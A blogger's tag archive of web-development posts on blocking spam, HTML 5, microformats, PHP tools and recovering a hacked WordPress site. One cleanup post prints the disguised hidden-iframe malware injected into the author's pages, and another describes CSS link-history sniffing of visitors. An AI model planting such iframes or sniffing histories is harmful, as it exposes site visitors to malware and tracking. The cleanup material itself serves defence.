Posts Tagged ‘web-development’

How to keep spam off your blog, bulletin board, or forum

Thursday, July 17th, 2008

Columns of gears in the difference engine Spam, it’s not just for breakfast and email anymore.  Webspam is a huge problem - if you run a blog or a forum, you’re probably familiar with the gobs and gobs of gibberish being posted all over the web by spammers.

This humble blog, which only gets a few hundred visitors per day, has had over 17,000 spam comments since I moved over to Wordpress last year.  Having your site inundated with comment spam can be just as big a headache as getting hacked.  No one wants to spend hours every day sorting the good posts from the bad.  I’ve already written about how to totally clear out a spammed forum and erase all traces of it’s reputation-marring existence, but the best solution is prevention.

Here are some steps you can take to help prevent spam on your blog or forum.

Keeping Spam off Your Blog

This section assumes you’re hosting your own blog and can add plugins and make configurartion changes, and my examples will be WordPress-heavy because I’m more familiar with WordPress.

Option 1:  Close or restrict comments. Most blogs give you some options to restrict who can comment on articles.  In Wordpress, you can require that users create accounts to comment under Settings -> General.  This might not help too much since I’ve seen hundreds of automated user accounts created right alongside the spam.

You can also require that comments are approved before they appear - in Wordpress look under Settings -> Discussion.  This will stop your blog from being graffitied without your knowledge but also requires manual effort.  You can also disallow trackbacks and pingbacks, which are really cool in theory but a major avenue for automated spam.

You can also shut down comments completely, or disable comments on old posts.  At that point you may be throwing the baby out with the bathwater, but it’s certainly effective.

Option 2:  Make sure commenters are real people with a captcha. Even if you’re not familiar with the term, you’re familiar with captchas.  They’re the little widgets at the end of a form where you have to decipher some scrambled text from an image.  Many blogs have captcha options built in, but if you’re looking for a captcha plugin be sure to balance usability with security.

I’ve used the Did You Pass Math plugin with some success.  Jeff Atwood has used an extremely simple captcha for years on his high-traffic blog.  Recaptcha is a really cool project that helps fight automatic posting and digitize old books at the same time.

Option 3:  Use an automatic filtering system. If you’re using Wordpress, I have three words for you:  Akismet, Akismet, Akismet! Seriously, Akismet is so good at automatically marking spammy commetns and trackbacks that it’s almost scary.  If you’re not using WordPress, you may still be able to find an Akismet plugin for your blogging platform.  There are other systems worth trying as well such as Spam Karma but I have less experience with those.

Keeping Spam off Your Forum

Again, I’m assuming you are hosting the forum yourself or can otherwise make config changes.  I’ll use phpBB (version 3) as an example because I’ve used it in the past.

Option 1:  Restrict user accounts. This can be a tough call, because when you start a forum you want to make it as easy as possible for people to join in the discussion.  Unfortunately, allowing anyone to register and begin posting without any admin approval also opens the door for spammers.

In phpBB this setting can be found in the Administration Control Panel under Board Configuration -> User Registration Settings.

Option 2:  Again with the captchas. Captchas aren’t 100 percent garanteed to remove spam but they do help.  If your forum software doesn’t have a captcha or a captcha plugin, I would seriously consider upgrading to a version that does or switching forums completely.  I know it’s a huge pain but waking up one morning to find 10,000 spam posts is even worse.

In phpBB3 look under Board Configuration -> User Registration Settings for a setting called “Enable visual confirmation for registrations” and make sure it’s turned on.  You can change the details under Board Configuration -> Visual confirmation settings.

Option 3:  Try to find an automatic filtering system. This is harder than for blogs.  There was an Akismet phpBB mod but it’s apparently not being maintained.  There’s a workaround involving the Spam Words mod that you can read about here.  The Spam Words mod might be worth trying on it’s own too.  Here’s a thread with more options for phpBB2, search around and find what’s available for your forum software.

Even without automated filtering, you can try to slow down the spammers by setting a time limit between posts (most human beings don’t type as quickly as spambots do).  Other options, such as disallowing links and BBCode, are pretty drastic but might make your blog less enticing.

Just for fun:

Spam, spam, bacon, and Spam

Sphere: Related Content

Great video on how to get your site back in Google

Friday, July 4th, 2008

Earlier I wrote a bit about what to do when your site has been hacked or spammed to the point where Google and Firefox start warning visitors away from your site.  If you find you site deleted from Google search results completely, you’ll want to file a reconsideration request.

Luckily, the Google Webmaster Central blog has a great post on how to make a request to get back into Google.  The post includes a step-by-step video.  You can also check out the Google Webmaster Help group if you have questions.

Sphere: Related Content

An interesting use of Greasemonkey - Troubleshooting other people’s sites

Wednesday, June 11th, 2008

Detriot-Superior and Center Street Bridge I’ve played around with Firefox’s Greasemonkey add-on here and there but never really delved into it until recently.  I found most of the common uses for it to be either too specific to someone else’s use habits or already covered by other extensions.  For example, there are probably a million ad blocking scripts out there, but I already have Adblock.

I’ve grown to appreciate Greasemonkey a lot more since I learned that you can make AJAX calls in scripts - now we can do some real damage.  But this post is not about that, it’s about a totally different use case that I hadn’t thought of before.

If you’re a web developer with any friends or family you’ve probably heard this one before:

“Something’s wrong with my web site, can you take a look?”

Often, though, you won’t have access to a dev server, database, or even a copy of the server-side code.  All you can see is the HTML and Javascript source and the HTTP transactions going back and forth.

Greasemonkey can’t rewrite PHP code on someone else’s server but it does make it really, really easy for you to alter forms, delete and change cookie values, and patch and debug Javascript on the site you’re looking at, without changing any other variables.

This can be really, really useful in some situations.  So now it’s officially added to my volunteer/web-developer/brother-in-law toolbelt.

Sphere: Related Content

XHTML 2 vs HTML 5 and the href Attribute

Monday, June 2nd, 2008

Spider web window - common motif in the Winchester HouseI wrote a little earlier about what I was looking forward to in HTML 5.  I haven’t had a chance to really collect my thoughts about XHTML 2 vs HTML 5, to be honest I’d be happy to see progress on both fronts.  I do have to say I lost interest in XHTML 2 early on when it seemed they were throwing some baby out with the bathwater.  HTML is not the cleanest, most elegant language but the ease of picking it up is part of why the web grew so quickly.  Even if that has forced browsers to cope with millions of pages of clunky, broken HTML.

Eric Meyer has at least one point in XHTML 2’s favor - the ability to add and href attribute to anything, making it a link.  In addition to making the <a> tag jealous, this would let you do some pretty cool stuff like turn an entire table row into a link in a dynamic data reporting web app without a lot of Javascript or duplicated tags.

By the way Eric is a fellow member of the Cleveland Web Standards Association and a great speaker.  If you get a chance to see a talk by him you should really check it out.

Sphere: Related Content

A Scary, but Fascinating Idea - Javascript and CSS hack to see where your users have been

Friday, May 30th, 2008

Invasion of Segway infantry!

I just ran across this post on Aza Raskin’s blog about a technique used to cut down the number of social bookmarking links displayed to users.  I’m sure you’ve seen them–the 20 or so colorful buttons that have popped up at the bottom of every blog post on the web, for Digg, Del.icio.us and similar sites.  On my blog they are hidden behind the ShareThis Widget but Raskin had a better idea - why not just display the ones each user actually uses?

Impossible?  Not so fast - think about what happens when you visit a site.  After your visit any links to the site will change, usually from blue to purple.  We can put up links to each social bookmarking site and then use Javascript and CSS to check to see if each link has been visited.  If so, display the button, and if not, hide it.

This is a very cool way to manage buttons but the technique has wider privacy implications.  I could, for example, put links to…  questionable sites, and then use some Ajax to collect that information about users.  If I had other information about you (say you logged into my site or otherwise gave me an email address) I could link it together and build a database.

On the other hand, it’s not like I can grab your entire browsing history or follow you around after you leave my site - I have to specifically create a link and check it for every site I want to know about.  And unlike your browser history this info is cleared every time you close your browser.  So it’s not spyware or anything as intrusive as, say, the Alexa toolbar.

I can think of a bunch of cool ways to apply this technique, but I’m not sharing until I implement one.  Feel free to post any ideas (or misgivings) in the comments below.

Sphere: Related Content

Fixing a ‘This site may harm your computer’ warning, part 3: Clearing a spammed forum

Saturday, March 22nd, 2008

Sun setting behind a sculpture in the park near Google Earlier I wrote about the steps you should take if your site has been hacked and is being slapped with a “This site may harm your computer” label. In that post we covered some of the sneaky ways scammers will insert text into your posts on Wordpress and other blog software.

But what if it’s even worse? Let’s say you installed a forum like phpBB to play around with but haven’t been keeping up with security updates. Or, even worse, your ftp account has been compromised and spammers have installed their own bulletin board or other content in a subfolder or subdomain. You don’t want Google and Yahoo thinking you are a spammer, so what do you do?

In that worst-case scenario, you’ll first need to change your passwords and make sure you have control of any and all ftp accounts, telnet accounts, etc. You may need to work with your host to make sure everything is locked down. Web server security is a big topic in it’s own right so from here on out we’ll assume you’ve already got that covered.

Step 1 - Delete the spam!

The first thing to do is delete the spammy bulletin board. Go ahead and delete all the contents of the directory. Don’t delete the directory itself quite yet. This does two things - it stops the spammers from getting any benefit from wayward visitors to your site and it causes your web server to start serving 404s (not found) to search engine spiders.

You can go one step further and explicitly tell browsers and spiders that this stuff is gone forever- by serving a 410 (gone). You can do this with any server-side language, my example will be in PHP. Create a new index.php file in your formerly-spammed directory that looks like this:

<?php header("HTTP/1.1 410 Gone");
header("Status: 410 Gone");?>

This will cover the main directory and then you can use mod_rewrite to redirect all the deleted pages to your 410 file.

Step 2 - Update your robots.txt

At this point search engine spiders will be able to figure out that the pages should be removed from their indexes, but only one page at a time as they re-crawl your site. You want it out of there ASAP, so create a robots.txt entry to tell spiders to stay away from the whole directory. It should look something like this:

User-agent: *
Disallow: /forum/

If the spam was in a subdomain, you’ll need to make sure you have a robots.txt file in the root directory of the subdomain that disallows the whole thing:

User-agent: *
Disallow: /

Step 3 - Tell Google about the spam

Log in to Google Webmaster Tools and look under Tools -> Remove URLs.  Create a new removal request for the subdirectory or subdomain you’ve cleaned.  This might seem a little redundant, since you’ve already done two steps that will let search engines know you’re no longer serving up spam.  But it’s worth being as explicit as possible to get your site’s reputation cleared as quickly as possible.

Bonus tip:  Subdomains and Google Webmaster Tools

If your spammed forum was in a subdomain, let’s say http://forum.exmaple.com, you’ll need to add the subdomain as a new site in Google Webmaster Tools.  You’ll need to go through the site verification process for the subdomain, too - it won’t verify automtically like if you had added a subdirectory as a new site.

By the way, if you’d like some more tips about keeping your site clean and tidy, check out this great post on the Google Webmaster Central Blog.

Any questions? Comments?  Tips that I’ve missed?  Please post in the comments section below.

Sphere: Related Content

Fixing a ‘This site may harm your computer’ warning, part 2: Hidden iFrames

Thursday, March 6th, 2008

Earlier I wrote about what I did when my Wordpress blog started returning a “This site may harm your computer” warning in Google and Firefox. Just to recap, these are the first steps to take to fix the problem:

  1. Plug the hole - update Wordpress (or your blog, forum, or CMS software) to plug any security holes.
  2. Repair the damage - search for spammy outgoing links or malware files on your pages and delete them.
  3. Clear your good name - request a review by StopBadware.org and in Google Webmaster Tools.

This is the right process to follow, but it turns out that I was a bit premature in doing step 3. Spammers and spyware spreaders are a wily, unpredictable bunch and they can’t be expected to stick to simple tactics like inserting links into posts.

The other tactic they used on my site was inserting invisible iFrames. These are harder to find because there aren’t as many automated tools to find them (or, at least, I don’t know of any) so it takes some manual searching through your source code. Here’s what the malware code looked like:


<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

<noscript></noscript> <iframe src=”http://61.132.75.71/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe><br />
<!– End Traffic Statistics –>

It looks like others have run into the same issue. Your anti-virus software may even give you a warning about a virus in a file named “wp-stats[1].htm.” In my case AVG Antvirus warned me about a trojan horse in my temp folder.

Once I removed the iframes, I resubmitted my request in Google Webmaster Tools. Here’s another helpful hint that took me a while to figure out: If only part of your site has been hacked and is marked in StopBadware.org’s database, you should Add that subdirectory as a new site in Webmaster Tools. Here’s an illustration (click to see full size):

webmaster-tools-subdir

In this screenshot you can see my main site, www.jasonmorrison.net. If I click there I don’t see any warning about spam or viruses in my blog at www.jasonmorrison.net/content. So I just added my blog as a new “site” and there I could see the warnings and make a reconsideration request.

One last thing: Google may send out an email to try to let you know about these sorts of problems. I never saw these emails, though, since they go to addresses like abuse@yourdomain.com and admin@yourdomain.comthat spammers also like to use. They ended up in my spam bucket. So you might want to whitelist email from google.com.

Next in part three I’ll talk about what to do when a whole subdomain (perhaps with a forum) is filled with spam. Please put questions or additional suggestions in the comments below.

Sphere: Related Content

What I did when my site showed up as a bad link

Wednesday, February 27th, 2008

This site is just a humble blog where I write a bit about programming, design, usability, and other topics I’m interested in. It’s nice that I get some readership and few few good comments now and again but I don’t have any real financial stake here, and I’m definitely not interested in trying to spam anyone, send them spyware, etc. So imagine my shock when I noticed that my blog comes up with a warning, “This site may harm your computer.”

This comes up in various places including Firefox 3 and Google searches.  Obviously no one is going to follow a link to my site with such a disclaimer. So where did it come from and what did I do to clear my sites good name?

The disclaimer comes from the findings of StopBadware.org, an effort that I had heard about in the past but hadn’t really looked into. It sounds like a great idea - it’s very difficult for users to investigate every single link they might click on, and some spyware and adware is hard to see before it’s too late. So Stopbadware.org is a sort of neighborhood watch for the web.

How did my site end up on the list? There are a number of possibilities, so the first step is to check StopBadware.org to see what they found. Follow this link to search for your URL. Make sure you search for your root domain, in my case jasonmorrison.net. Some subdomains or directories might show up with a report while others are still considered clean. This confused me for a while.

Once you see the details there it’s time to hunt for problems. If you have anything more than a simple, static site this can be more difficult than it might first seem. My site uses Wordpress and allows user comments. A bad link to show up in a comment, or someone may have hacked the site using a known vulnerability. It looks like it was the latter in my case, but I’m getting ahead of myself. How do you find the bad link?

There are lots of tools to find incoming links to your site, but I’ve only found one so far that checks outgoing links, at Bad Neighborhood. Don’t blindly rely on this tool, but follow up on any links that you don’t recognize having put there yourself. I found a link in the middle of a post from a month or so ago to some spammy German site.

How did the link get there? I don’t think my site was hacked wholesale (or if it was, they were very subtle about it). More likely someone took advantage of my laziness as upgrading Wordpress and used a known security exploit.

Now that we’ve found and removed the offending link and plugged any known security holes, it’s time to try to get the stigma removed. Follow the link to the StopBadware.org request for review page and fill out a request. If the badware report came from one of their partners, you may have to follow up with them as well. I’m still waiting to here back on my review, I’ll post an update when I know more.

Hopefully this has been helpful. Let me know if you have any questions or suggestions in the comments below.

Sphere: Related Content

The Top Ten Best Things About HTML 5

Sunday, December 30th, 2007

html-source The Word Wide Web has grown at an astounding pace and is pretty ingrained in a lot of our daily lives - you’re reading it right now. Part of the reason it has been so successful has been the flexibility and ease of use of the basic language of web pages, HTML.

Most web sites are developed in HTML 4 (first released in 1997) or XHTML (from 2000). Considering the rapid change all around the web, why hasn’t there been a new version, and what’s next for the Web? One reason we haven’t seen new versions is the aforementioned flexibility. There have been plenty of developments, from blogging software and other content management systems on the server side to CSS, AJAX, and embedded Flash video on the front end.

Microformats are a part of this and will be a big part of the future too. But all the web developers in the house should get up to speed on HTML 5, which looks to be the future of the Web.

I’ve been watching what the Web Hypertext Application Technology Working Group (WHATWG) has been doing with HTML 5 ever since I took a gander at the W3C’s XHTML 2 spec and figured out that they were mostly adding annoyance and removing backwards compatibility. Guys I respect, like Eric Meyer, seemed to agree. The WHATWG decided to work on their own ideas and came up with HTML, which was eventually adopted by the W3C as well.

I haven’t taken a look in a while but Marcia Zeng mentioned the HTML 5 spec in an email recently and it got me interested in checking back in. I have to say, for the most part, it’s looking very interesting.

So I decided to put together a quick list of my top 10 new things in HTML 5:

  1. The <nav> element. This will be great for the billions of navbars we web developers have been coding up for the past 10 years. Things like this will help reduce the problem of div soup and make structure more apparent.
  2. The <header> and <footer> elements. See the last entry and add in the billions of page headers and footers we’ve produced as well. Semantically meaningful tags like these can only help browser plugin writers, search engine programmers, and other hackers to come up with cool new features.
  3. The death of the dreaded <font> tag. This should have been banished as soon as CSS was widely supported. It was a pain in the rear to use back in the 1990s when coding by hand, and was even worse when inserted by GUI tools like FrontPage.
  4. The continued usefulness of the <img> element. You may be wondering how we could make web pages without the image element, but XHTML2 only included it grudgingly, recommending everyone use <object> instead. The problem is that just about anything could be an object, the tag is almost meaningless. Why not replace all tags with <thing>?
  5. The <audio> and <video> elements. There’s been some controversy about this, because the W3C originally recommended use of the open source Ogg formats but later recanted. Still, it will be nice to embed audio and video as easily and consistently as images are used now.
  6. New <input> types for dates, urls, etc. When you have a form that requires a user input a date or some other specialized data, you choices have been to present a plain text input or jazz things up with JavaScript to make it a bit more usable. HTML 5 adds specific types for these cases.
  7. The conenteditable API. This will be really interesting if it’s fully supported. In Tim Berners-Lee’s original vision for the web, documents would be easily editable. Wikis get us almost there, but a standard editing API would be even better.
  8. A required attribute for form inputs. This won’t mean we can stop checking incoming data on the server side (users can still POST arbitrary data with the right tools) but it should remove the need for millions of little field-checking JavaScripts.
  9. The <figure> and <legend> elements. This will make it a little easier to associate captions and other text to images. Look for CMSs and image search engines to take advantage of these tags.
  10. An open development process. Want to keep an eye on development? Got an idea or concern about the spec? Hop on one of the mailing lists. Open standards are great for promoting compatibility and competition, so open development of the standards just makes sense.

Sphere: Related Content

The power of microformats

Monday, December 3rd, 2007

Considering a Descent A few months ago I attended a really interesting talk by Eric Meyer where he touched on the use of microformats.  You might know Eric from his excellent O’Reilly Press CSS books.

What are microformats?  Before giving an example, I’ll give a little context.  When Tim Berners-Lee created the web, he tried to make HTML simple, flexible, and meaningful.  He succeeded on the first two counts but the third was quickly left by the wayside - many designers didn’t care what a particular tag meant, so long as it could be used for page layout.  The use of tables to arrange graphic elements instead of holding tabular data is a perfect example.

So Berners-Lee has been talking for years about the next step - the semantic web.  In the semantic web, tags are used to say what a particular piece of content is, with all styling done with stylesheets.  There is, of course, more to the semantic web than just separating content and presentation, after all you can work that way with HTML and CSS now.  One other key component is the web of trust, where people and web sites are able to describe relationships to each other so that search engines can help you find trustworthy content automatically.

Unfortunately, the semantic web has not really taken off.  There have been lots of meetings and XML schemas but it’s all too complicated, the process is too bureaucratic, and everything is being designed from the top down.

This is where microformats come in.  Let’s say you have a blog and you’ve tagged all your articles.  You’d like to let search engines and aggregators like Technorati know what your tags are.  But HTML doesn’t have anything like this:

<tag>semantic web<tag>

So what do you do?  Simple, use the rel-tag microformat:

<a href=”http://example.com/tag/semantic+web” rel=”tag”>semantic web</a>

The microformat makes use of existing html tags and attributes and just follows simple conventions.  But now that this little bit of meaning can be interpreted by spiders and other programs, we’ve actually added a pretty powerful bit of functionality to the web.

Most blog software, including WordPress, includes does microformatting for you.  If install my tag cloud plugin Altocumulous, and view source, you can see for yourself.

For intranet purposes, the hCard and hCalendar microformats look promising.  Take a look at microformats.org to see why I think so.  I’ll write more on it later.

Sphere: Related Content

How do you set up a PHP development environment?

Saturday, November 10th, 2007

DSCN1377-1Are you a budding web developer wondering where to start?  An old hand looking for new tools?  Let me tell you a little bit about how I do my PHP / web development work, and maybe some it will be of use to you.

I am starting up some work on Mealographer again.  It definitely needs it, I did a usability test about a year ago and still haven’t fixed the issues I uncovered.  I haven’t been doing a lot of work in PHP recently, at my day job is all Java all the time.  I used to be happy with a text editor, a server somewhere and a browser, but since I’ve been using Eclipse I’ve become spoiled by better tools.

So what do you need to get started?  If you just want to play around, all you need is:

A text editor.  You can use Notepad, but I’ve used HTMLKit in the past.  It’s free and it does basic stuff like syntax highlighting nicely.

A server.  You can set everything up on a remote server, many have PHP accounts for as low as $5/month.  Right now I use Site5 [referral link].  I also want to give a shout out to Q5Media, though PHP isn’t their main thing.

A browser.  This is pretty basic, but worth mentioning.  You need Firefox, which is free to download.  You’ll also want to test things in IE, which you probably already had.

You can do real work with just the above.  It’s worth taking advantage of all the great tools out there, though, including:

An integrated development environment (IDE) - I’m pretty happy with Eclipse for Java development (or the related IBM RAD 6).  What about for PHP?  Right now I’m trying to decide between PHPEclispe and the PDT plugin.  Anyone have an opinion on which way to go?

A local development server - If you want to run PHP locally on windows, you can install Apache or get PHP working on IIS.  In my experience, though, you can’t beat WAMPSERVER - it includes Apache, MySQL and PHP and makes configuration pretty easy.

Source control - There’s no way to keep track of a project of any real size without a change management system.  I have used CVS a lot, and SmartCVS is a good free client.  There are also CVS plugins for Eclipse.  I have heard a lot of good things about Subversion as well.

Web developer plugins for Firefox - seriously, if you don’t have these, you might as well tie your hand behind your back when writing JavaScript of CSS.  Here’s a good list of Firefox plugins.

So that’s what I use - what am I missing?  Post suggestions in the comments below.

Sphere: Related Content

Software Comparison: ASP.NET vs PHP

Tuesday, February 17th, 2004

ASP.NET and PHP

Virtually every medium or large web site now uses some kind of server-side scripting to generate web pages and interactive features instead of static html. A number of technologies are used for this purpose, including PHP, ASP.NET, Perl, ColdFusion, and JSP. This paper will look at Microsoft’s ASP.NET and an open-source alternative, PHP, and compare them in terms of cost, performance, support, features and ease of use for web development.

 

Comparing ASP and PHP can be difficult because they are not exactly the same class of software. PHP is simply a server-side scripting language. The PHP homepage describes it as “a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML.”1 ASP, more properly ASP.NET, is not a language per se, and allows users to program Microsoft Internet Information Services (IIS) in Jscript, Vbscript, and C#, among others. ASP.NET is a little harder to define than PHP. ASP stands for Active Server Pages, and .NET, according to Microsoft, “is a set of Microsoft software technologies for connecting information, people, systems, and devices. It enables a high level of software integration through the use of Web services—small, discrete, building-block applications that connect to each other as well as to other, larger applications over the Internet.”2

 

Despite major structural differences, the two can and should be compared because they can be used to create the same kinds of medium-to-large, dynamic, often database-driven web sites. Server-side scripting allows sites to easily edit and update information, offer interactive features like forums and personalization, and track user traffic.

  (more…)

Sphere: Related Content